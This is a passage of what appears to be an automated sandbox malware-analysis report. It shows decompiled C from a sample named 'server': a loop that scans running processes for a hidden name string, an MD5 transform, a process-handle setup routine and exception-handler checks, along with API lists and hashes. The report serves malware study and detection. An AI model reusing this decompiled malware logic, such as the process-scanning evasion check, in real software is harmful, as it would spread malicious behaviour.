              0x02ce1ed7
              0x02ce1ed7
              0x02ce1ee4
              0x02ce1ee4
              0x02ce1eef
              0x02ce1ef1
              0x02ce1efb
              0x02ce1f00
              0x02ce1f00
              0x02ce1efb
              0x02ce1f07
              0x02ce1f1d
              0x02ce1f09
              0x02ce1f09
              0x02ce1f16
              0x02ce1f16
              0x02ce1f21
              0x02ce1f34
              0x02ce1f34
              0x00000000
              0x02ce1f23
              0x02ce1f23
              0x02ce1f2d
              0x00000000
              0x02ce1f3e
              0x02ce1f3e
              0x02ce1f40
              0x02ce1f56
              0x02ce1f42
              0x02ce1f42
              0x02ce1f4f
              0x02ce1f4f
              0x02ce1f5a
              0x02ce1f5c
              0x02ce1f5f
              0x02ce1f60
              0x02ce1f67
              0x02ce1f69
              0x02ce1f6a
              0x02ce1f6a
              0x02ce1f67
              0x02ce1f71
              0x02ce1f87
              0x02ce1f73
              0x02ce1f73
              0x02ce1f80
              0x02ce1f80
              0x02ce1f8b
              0x02ce1f99
              0x02ce1fa3
              0x02ce1fa3
              0x02ce1fab
              0x02ce1fc1
              0x02ce1fad
              0x02ce1fad
              0x02ce1fba
              0x02ce1fba
              0x02ce1fc5
              0x02ce1fd8
              0x02ce1fd8
              0x02ce1fdd
              0x02ce1fe3
              0x00000000
              0x02ce1fc7
              0x02ce1fca
              0x02ce1fcf
              0x02ce1fd6
              0x02ce1fe8
              0x02ce1fea
              0x02ce2000
              0x02ce1fec
              0x02ce1fec
              0x02ce1ff9
              0x02ce1ff9
              0x02ce2004
              0x02ce2010
              0x02ce2015
              0x02ce2015
              0x02ce2006
              0x02ce2009
              0x02ce2009
              0x02ce2023
              0x02ce2028
              0x02ce202e
              0x00000000
              0x02ce2031
              0x00000000
              0x02ce1fd6
              0x02ce1fc5
              0x02ce1f2d
              0x02ce1f21

              APIs
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1E2F
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1E61
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1E93
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1EC5
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1EF7
              • StrToIntExA.SHLWAPI(00000000,00000000,?,02CEA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02CE1F29
              • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02CE2028
              • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02CE203C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeHeap
              • String ID: Uqt
              • API String ID: 3298025750-2320327147
              • Opcode ID: 2b3df0e0fb57039d0e3512f5253c844feb3dccc8e44f596193ca78010ca77cc7
              • Instruction ID: 1050b0f6a7eb726eb7f1ce50b75cdac7d2a034694ced3d9dded5e0ff8de98d30
              • Opcode Fuzzy Hash: 2b3df0e0fb57039d0e3512f5253c844feb3dccc8e44f596193ca78010ca77cc7
              • Instruction Fuzzy Hash: BF819770E10144EFCF10EBB58D88E5B76FEA7887047680E25E50BD7244E7B5DE608B61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E02CE30D5() {
              				char _v264;
              				void* _v300;
              				int _t8;
              				intOrPtr _t9;
              				int _t15;
              				void* _t17;
              
              				_t15 = 0;
              				_t17 = CreateToolhelp32Snapshot(2, 0);
              				if(_t17 != 0) {
              					_t8 = Process32First(_t17,  &_v300);
              					while(_t8 != 0) {
              						_t9 =  *0x2cea348; // 0x256d5a8
              						_t2 = _t9 + 0x2cebe88; // 0x73617661
              						_push( &_v264);
              						if( *0x2cea12c() != 0) {
              							_t15 = 1;
              						} else {
              							_t8 = Process32Next(_t17,  &_v300);
              							continue;
              						}
              						L7:
              						CloseHandle(_t17);
              						goto L8;
              					}
              					goto L7;
              				}
              				L8:
              				return _t15;
              			}









              0x02ce30e0
              0x02ce30ea
              0x02ce30ee
              0x02ce30f8
              0x02ce3129
              0x02ce30ff
              0x02ce3104
              0x02ce3111
              0x02ce311a
              0x02ce3131
              0x02ce311c
              0x02ce3124
              0x00000000
              0x02ce3124
              0x02ce3132
              0x02ce3133
              0x00000000
              0x02ce3133
              0x00000000
              0x02ce312d
              0x02ce3139
              0x02ce313e

              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CE30E5
              • Process32First.KERNEL32(00000000,?), ref: 02CE30F8
              • Process32Next.KERNEL32(00000000,?), ref: 02CE3124
              • CloseHandle.KERNEL32(00000000), ref: 02CE3133
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
              • String ID:
              • API String ID: 420147892-0
              • Opcode ID: 84dcbad0c348e2f368744ba3ae140eb674b5284e83b81c7b418f32a372a1bd93
              • Instruction ID: 71d5638102d030a3e24288bf8e34b0ef1985b3a92b8fa731335cfcb92d55500d
              • Opcode Fuzzy Hash: 84dcbad0c348e2f368744ba3ae140eb674b5284e83b81c7b418f32a372a1bd93
              • Instruction Fuzzy Hash: ACF0B4325001A4AADF20A6669C49FFB76ACDFC5310F0101A5FA47C7000EB30EA59CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00401D68() {
              				void* _t1;
              				unsigned int _t3;
              				void* _t4;
              				long _t5;
              				void* _t6;
              				intOrPtr _t10;
              				void* _t14;
              
              				_t10 =  *0x404170;
              				_t1 = CreateEventA(0, 1, 0, 0);
              				 *0x40417c = _t1;
              				if(_t1 == 0) {
              					return GetLastError();
              				}
              				_t3 = GetVersion();
              				if(_t3 != 5) {
              					L4:
              					if(_t14 <= 0) {
              						_t4 = 0x32;
              						return _t4;
              					} else {
              						goto L5;
              					}
              				} else {
              					if(_t3 >> 8 > 0) {
              						L5:
              						 *0x40416c = _t3;
              						_t5 = GetCurrentProcessId();
              						 *0x404168 = _t5;
              						 *0x404170 = _t10;
              						_t6 = OpenProcess(0x10047a, 0, _t5);
              						 *0x404164 = _t6;
              						if(_t6 == 0) {
              							 *0x404164 =  *0x404164 | 0xffffffff;
              						}
              						return 0;
              					} else {
              						_t14 = _t3 - _t3;
              						goto L4;
              					}
              				}
              			}










              0x00401d69
              0x00401d77
              0x00401d7d
              0x00401d84
              0x00401ddb
              0x00401ddb
              0x00401d86
              0x00401d8e
              0x00401d9b
              0x00401d9b
              0x00401dd7
              0x00401dd9
              0x00000000
              0x00000000
              0x00000000
              0x00401d90
              0x00401d97
              0x00401d9d
              0x00401d9d
              0x00401da2
              0x00401db0
              0x00401db5
              0x00401dbb
              0x00401dc1
              0x00401dc8
              0x00401dca
              0x00401dca
              0x00401dd4
              0x00401d99
              0x00401d99
              0x00000000
              0x00401d99
              0x00401d97

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • GetVersion.KERNEL32 ref: 00401D86
              • GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: Process$CreateCurrentEventOpenVersion
              • String ID:
              • API String ID: 845504543-0
              • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
              • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
              • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
              • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 49%
              			E02CE16DF(void* __ecx, intOrPtr* _a4) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				intOrPtr _v44;
              				intOrPtr _v48;
              				intOrPtr _v52;
              				intOrPtr _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				void _v76;
              				intOrPtr* _t226;
              				signed int _t229;
              				signed int _t231;
              				signed int _t233;
              				signed int _t235;
              				signed int _t237;
              				signed int _t239;
              				signed int _t241;
              				signed int _t243;
              				signed int _t245;
              				signed int _t247;
              				signed int _t249;
              				signed int _t251;
              				signed int _t253;
              				signed int _t255;
              				signed int _t257;
              				signed int _t259;
              				signed int _t338;
              				signed char* _t348;
              				signed int _t349;
              				signed int _t351;
              				signed int _t353;
              				signed int _t355;
              				signed int _t357;
              				signed int _t359;
              				signed int _t361;
              				signed int _t363;
              				signed int _t365;
              				signed int _t367;
              				signed int _t376;
              				signed int _t378;
              				signed int _t380;
              				signed int _t382;
              				signed int _t384;
              				intOrPtr* _t400;
              				signed int* _t401;
              				signed int _t402;
              				signed int _t404;
              				signed int _t406;
              				signed int _t408;
              				signed int _t410;
              				signed int _t412;
              				signed int _t414;
              				signed int _t416;
              				signed int _t418;
              				signed int _t420;
              				signed int _t422;
              				signed int _t424;
              				signed int _t432;
              				signed int _t434;
              				signed int _t436;
              				signed int _t438;
              				signed int _t440;
              				signed int _t508;
              				signed int _t599;
              				signed int _t607;
              				signed int _t613;
              				signed int _t679;
              				void* _t682;
              				signed int _t683;
              				signed int _t685;
              				signed int _t690;
              				signed int _t692;
              				signed int _t697;
              				signed int _t699;
              				signed int _t718;
              				signed int _t720;
              				signed int _t722;
              				signed int _t724;
              				signed int _t726;
              				signed int _t728;
              				signed int _t734;
              				signed int _t740;
              				signed int _t742;
              				signed int _t744;
              				signed int _t746;
              				signed int _t748;
              
              				_t226 = _a4;
              				_t348 = __ecx + 2;
              				_t401 =  &_v76;
              				_t682 = 0x10;
              				do {
              					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
              					_t401 =  &(_t401[1]);
              					_t348 =  &(_t348[4]);
              					_t682 = _t682 - 1;
              				} while (_t682 != 0);
              				_t6 = _t226 + 4; // 0x14eb3fc3
              				_t683 =  *_t6;
              				_t7 = _t226 + 8; // 0x8d08458b
              				_t402 =  *_t7;
              				_t8 = _t226 + 0xc; // 0x56c1184c
              				_t349 =  *_t8;
              				asm("rol eax, 0x7");
              				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
              				asm("rol ecx, 0xc");
              				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
              				asm("ror edx, 0xf");
              				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
              				asm("ror esi, 0xa");
              				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
              				_v8 = _t685;
              				_t690 = _v8;
              				asm("rol eax, 0x7");
              				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
              				asm("rol ecx, 0xc");
              				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
              				asm("ror edx, 0xf");
              				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
              				asm("ror esi, 0xa");
              				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
              				_v8 = _t692;
              				_t697 = _v8;
              				asm("rol eax, 0x7");
              				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
              				asm("rol ecx, 0xc");
              				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
              				asm("ror edx, 0xf");
              				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
              				asm("ror esi, 0xa");
              				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
              				_v8 = _t699;
              				asm("rol eax, 0x7");
              				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
              				asm("rol ecx, 0xc");
              				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
              				_t508 =  !_t357;
              				asm("ror edx, 0xf");
              				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
              				_v12 = _t410;
              				_v12 =  !_v12;
              				asm("ror esi, 0xa");
              				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
              				asm("rol eax, 0x5");
              				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
              				asm("rol ecx, 0x9");
              				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
              				asm("rol edx, 0xe");
              				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
              				asm("ror esi, 0xc");
              				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
              				asm("rol eax, 0x5");
              				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
              				asm("rol ecx, 0x9");
              				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
              				asm("rol edx, 0xe");
              				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
              				asm("ror esi, 0xc");
              				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
              				asm("rol eax, 0x5");
              				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
              				asm("rol ecx, 0x9");
              				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
              				asm("rol edx, 0xe");
              				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
              				asm("ror esi, 0xc");
              				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
              				asm("rol eax, 0x5");
              				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
              				asm("rol ecx, 0x9");
              				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
              				asm("rol edx, 0xe");
              				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
              				asm("ror esi, 0xc");
              				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
              				asm("rol eax, 0x4");
              				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
              				asm("rol ecx, 0xb");
              				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
              				asm("rol edx, 0x10");
              				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
              				_t599 = _t367 ^ _t420;
              				asm("ror esi, 0x9");
              				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
              				asm("rol eax, 0x4");
              				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
              				asm("rol edi, 0xb");
              				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
              				asm("rol edx, 0x10");
              				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
              				_t338 = _t607 ^ _t422;
              				asm("ror ecx, 0x9");
              				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
              				asm("rol eax, 0x4");
              				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
              				asm("rol esi, 0xb");
              				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
              				asm("rol edi, 0x10");
              				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
              				_t424 = _t734 ^ _t613;
              				asm("ror ecx, 0x9");
              				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
              				asm("rol eax, 0x4");
              				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
              				asm("rol edx, 0xb");
              				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
              				asm("rol esi, 0x10");
              				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
              				asm("ror ecx, 0x9");
              				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
              				asm("rol eax, 0x6");
              				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
              				asm("rol edx, 0xa");
              				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
              				asm("rol esi, 0xf");
              				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
              				asm("ror ecx, 0xb");
              				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
              				asm("rol eax, 0x6");
              				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
              				asm("rol edx, 0xa");
              				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
              				asm("rol esi, 0xf");
              				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
              				asm("ror ecx, 0xb");
              				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
              				asm("rol eax, 0x6");
              				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
              				asm("rol edx, 0xa");
              				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
              				asm("rol esi, 0xf");
              				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
              				asm("ror edi, 0xb");
              				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
              				asm("rol eax, 0x6");
              				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
              				asm("rol edx, 0xa");
              				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
              				_t400 = _a4;
              				asm("rol esi, 0xf");
              				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
              				 *_t400 =  *_t400 + _t259;
              				asm("ror eax, 0xb");
              				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
              				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
              				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
              				return memset( &_v76, 0, 0x40);
              			}


































































































              0x02ce16e2
              0x02ce16ed
              0x02ce16f0
              0x02ce16f3
              0x02ce16f4
              0x02ce1712
              0x02ce1714
              0x02ce1717
              0x02ce171a
              0x02ce171a
              0x02ce171d
              0x02ce171d
              0x02ce1720
              0x02ce1720
              0x02ce1723
              0x02ce1723
              0x02ce1740
              0x02ce1743
              0x02ce1759
              0x02ce175c
              0x02ce1776
              0x02ce1779
              0x02ce178f
              0x02ce1792
              0x02ce1794
              0x02ce17ac
              0x02ce17af
              0x02ce17b2
              0x02ce17ca
              0x02ce17cd
              0x02ce17e7
              0x02ce17ea
              0x02ce1800
              0x02ce1803
              0x02ce1805
              0x02ce181d
              0x02ce1822
              0x02ce1825
              0x02ce183b
              0x02ce183e
              0x02ce1858
              0x02ce185b
              0x02ce1871
              0x02ce1874
              0x02ce1876
              0x02ce1891
              0x02ce1894
              0x02ce18ab
              0x02ce18ae
              0x02ce18b2
              0x02ce18cb
              0x02ce18ce
              0x02ce18d0
              0x02ce18d3
              0x02ce18ee
              0x02ce18f1
              0x02ce190a
              0x02ce190d
              0x02ce191d
              0x02ce1920
              0x02ce1938
              0x02ce193b
              0x02ce1955
              0x02ce1958
              0x02ce1970
              0x02ce1973
              0x02ce1989
              0x02ce198c
              0x02ce19a4
              0x02ce19a7
              0x02ce19bf
              0x02ce19c2
              0x02ce19dc
              0x02ce19df
              0x02ce19f5
              0x02ce19f8
              0x02ce1a10
              0x02ce1a13
              0x02ce1a2d
              0x02ce1a30
              0x02ce1a48
              0x02ce1a4b
              0x02ce1a61
              0x02ce1a64
              0x02ce1a7c
              0x02ce1a7f
              0x02ce1a97
              0x02ce1a9a
              0x02ce1aac
              0x02ce1aaf
              0x02ce1ac1
              0x02ce1ac4
              0x02ce1ad6
              0x02ce1ad9
              0x02ce1add
              0x02ce1aed
              0x02ce1af0
              0x02ce1afe
              0x02ce1b01
              0x02ce1b13
              0x02ce1b16
              0x02ce1b2a
              0x02ce1b2d
              0x02ce1b2f
              0x02ce1b3f
              0x02ce1b42
              0x02ce1b54
              0x02ce1b57
              0x02ce1b65
              0x02ce1b68
              0x02ce1b7a
              0x02ce1b7d
              0x02ce1b81
              0x02ce1b91
              0x02ce1b94
              0x02ce1ba6
              0x02ce1ba9
              0x02ce1bb7
              0x02ce1bba
              0x02ce1bcc
              0x02ce1bcf
              0x02ce1be1
              0x02ce1be4
              0x02ce1bf8
              0x02ce1bfb
              0x02ce1c0f
              0x02ce1c12
              0x02ce1c26
              0x02ce1c29
              0x02ce1c3d
              0x02ce1c40
              0x02ce1c54
              0x02ce1c57
              0x02ce1c6b
              0x02ce1c70
              0x02ce1c82
              0x02ce1c85
              0x02ce1c99
              0x02ce1c9c
              0x02ce1cb0
              0x02ce1cb3
              0x02ce1cc9
              0x02ce1ccc
              0x02ce1ce0
              0x02ce1ce3
              0x02ce1cf5
              0x02ce1cf8
              0x02ce1d0c
              0x02ce1d0f
              0x02ce1d23
              0x02ce1d26
              0x02ce1d3a
              0x02ce1d43
              0x02ce1d46
              0x02ce1d4f
              0x02ce1d58
              0x02ce1d60
              0x02ce1d68
              0x02ce1d72
              0x02ce1d87

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: memset
              • String ID:
              • API String ID: 2221118986-0
              • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
              • Instruction ID: 65f4bedc90513c176f5cc7eed08eb59751e51e9f8bdace6ce4d5ebd7f6e137f6
              • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
              • Instruction Fuzzy Hash: E722857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE8551(long _a4) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				short* _v32;
              				void _v36;
              				void* _t57;
              				signed int _t58;
              				signed int _t61;
              				signed int _t62;
              				void* _t63;
              				signed int* _t68;
              				intOrPtr* _t69;
              				intOrPtr* _t71;
              				intOrPtr _t72;
              				intOrPtr _t75;
              				void* _t76;
              				signed int _t77;
              				void* _t78;
              				void _t80;
              				signed int _t81;
              				signed int _t84;
              				signed int _t86;
              				short* _t87;
              				void* _t89;
              				signed int* _t90;
              				long _t91;
              				signed int _t93;
              				signed int _t94;
              				signed int _t100;
              				signed int _t102;
              				void* _t104;
              				long _t108;
              				signed int _t110;
              
              				_t108 = _a4;
              				_t76 =  *(_t108 + 8);
              				if((_t76 & 0x00000003) != 0) {
              					L3:
              					return 0;
              				}
              				_a4 =  *[fs:0x4];
              				_v8 =  *[fs:0x8];
              				if(_t76 < _v8 || _t76 >= _a4) {
              					_t102 =  *(_t108 + 0xc);
              					__eflags = _t102 - 0xffffffff;
              					if(_t102 != 0xffffffff) {
              						_t91 = 0;
              						__eflags = 0;
              						_a4 = 0;
              						_t57 = _t76;
              						do {
              							_t80 =  *_t57;
              							__eflags = _t80 - 0xffffffff;
              							if(_t80 == 0xffffffff) {
              								goto L9;
              							}
              							__eflags = _t80 - _t91;
              							if(_t80 >= _t91) {
              								L20:
              								_t63 = 0;
              								L60:
              								return _t63;
              							}
              							L9:
              							__eflags =  *(_t57 + 4);
              							if( *(_t57 + 4) != 0) {
              								_t12 =  &_a4;
              								 *_t12 = _a4 + 1;
              								__eflags =  *_t12;
              							}
              							_t91 = _t91 + 1;
              							_t57 = _t57 + 0xc;
              							__eflags = _t91 - _t102;
              						} while (_t91 <= _t102);
              						__eflags = _a4;
              						if(_a4 == 0) {
              							L15:
              							_t81 =  *0x2cea380; // 0x0
              							_t110 = _t76 & 0xfffff000;
              							_t58 = 0;
              							__eflags = _t81;
              							if(_t81 <= 0) {
              								L18:
              								_t104 = _t102 | 0xffffffff;
              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
              								__eflags = _t61;
              								if(_t61 < 0) {
              									_t62 = 0;
              									__eflags = 0;
              								} else {
              									_t62 = _a4;
              								}
              								__eflags = _t62;
              								if(_t62 == 0) {
              									L59:
              									_t63 = _t104;
              									goto L60;
              								} else {
              									__eflags = _v12 - 0x1000000;
              									if(_v12 != 0x1000000) {
              										goto L59;
              									}
              									__eflags = _v16 & 0x000000cc;
              									if((_v16 & 0x000000cc) == 0) {
              										L46:
              										_t63 = 1;
              										 *0x2cea3c8 = 1;
              										__eflags =  *0x2cea3c8;
              										if( *0x2cea3c8 != 0) {
              											goto L60;
              										}
              										_t84 =  *0x2cea380; // 0x0
              										__eflags = _t84;
              										_t93 = _t84;
              										if(_t84 <= 0) {
              											L51:
              											__eflags = _t93;
              											if(_t93 != 0) {
              												L58:
